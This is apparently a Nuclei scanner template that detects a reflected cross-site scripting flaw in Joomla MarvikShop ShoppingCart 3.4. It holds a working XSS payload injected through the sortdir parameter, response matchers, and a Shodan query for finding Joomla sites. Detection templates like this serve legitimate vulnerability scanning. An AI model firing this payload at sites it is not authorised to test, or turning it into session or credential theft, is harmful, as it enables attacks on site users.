id: joomla-marvikshop-xss

info:
  name: Joomla MarvikShop ShoppingCart 3.4 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Joomla MarvikShop ShoppingCart 3.4 is vulnerable to reflected xss where attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  reference:
    - https://packetstormsecurity.com/files/168598/Joomla-MarvikShop-ShoppingCart-3.4-Cross-Site-Scripting.html
    - https://cxsecurity.com/issue/WLB-2022100015
    - https://extensions.joomla.org/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Joomla"
  tags: packetstorm,joomla,marvikshop,xss,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po%3Cimg%20src=a%20onerror=alert(document.domain)%3Evh217"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<img src=a onerror=alert(document.domain)>") && contains(body, "TEP STOP")'
          - 'contains(content_type, "text/html")'
        condition: and

# digest: 490a0046304402200f74f178ad5070e934c5420572df5b1e1dff5877545bd81d8bd156b5b266f65802201fd2dcaaef9557aa488c4fd0b6073ec3d00ba84f124a3b868e9d93424520746c:922c64590222798bb761d5b6d8e72950
